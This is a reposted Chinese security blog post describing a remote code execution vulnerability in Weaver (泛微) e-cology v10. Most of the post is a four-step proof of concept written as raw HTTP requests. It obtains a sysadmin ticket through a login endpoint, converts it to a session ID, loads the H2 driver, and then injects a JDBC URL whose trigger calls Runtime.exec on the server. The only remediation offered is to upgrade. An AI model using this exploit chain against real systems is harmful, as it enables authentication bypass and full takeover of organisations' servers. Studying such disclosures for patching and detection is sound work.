泛微 e-cology v10 远程代码执行漏洞

admin 2024年8月23日00:24:01评论54 views字数 1897阅读6分19秒阅读模式
简介
泛微E10可帮助每个组织构建一个数字化平台来搭建应用、集成系统、打通数据,让组织内部“人事、市场、销售、项目、客服、财务、采购“等部门协同工作,同时与外部的供应商、代理商、客户、伙伴在一个平台实时互通,E10构建的是一个内外部协同的数字化运营体系,让整个组织运营更智能、更协同、更高效。
漏洞描述
泛微Ecology-10.0存在远程代码执行漏洞,该漏洞通过Ecology-10.0获取管理员访问令牌,然后通过JDBC反序列化和实现RCE,系统必须依赖于 H2 数据库。
漏洞复现
(关注公众号,私信【20240821】即可获取完整POC)

泛微 e-cology v10 远程代码执行漏洞

Poc
第一步:
POST /papi/passport/rest/appThirdLogin HTTP/1.1
Host:x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

username=sysadmin&service=1&ip=1&loginType=third

第二步:
POST /papi/passport/login/generateEteamsId HTTP/1.1
Host:x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

stTicket=第一步返回的serviceTicketId值

第三步:加载数据库驱动类
POST /api/bs/iaauthclient/base/save HTTP/1.1
Host:x.x.x.x
Content-Length: 86
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ip
Referer: http://ip/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
ETEAMSID: 第二步返回的data值

{"isUse":1,"auth_type":"custom","iaAuthclientCustomDTO":{"ruleClass":"org.h2.Driver"}}

第四步:
POST /api/dw/connSetting/testConnByBasePassword HTTP/1.1
Host:x.x.x.x
Content-Length: 199
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ip
Referer: http://ip/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
ETEAMSID: 返回的data值

{"dbType":"mysql5","dbUrl":"jdbc:h2:mem:test;MODE=MSSQLServer;init = CREATE TRIGGER hhhh BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ //javascript\njava.lang.Runtime.getRuntime().exec(\"id\")$$"}



修复建议
升级到安全版本!!!

原文始发于微信公众号(白帽攻防):【漏洞复现】泛微 e-cology v10 远程代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月23日00:24:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微 e-cology v10 远程代码执行漏洞http://cn-sec.com/archives/3084271.html

发表评论

匿名网友 填写信息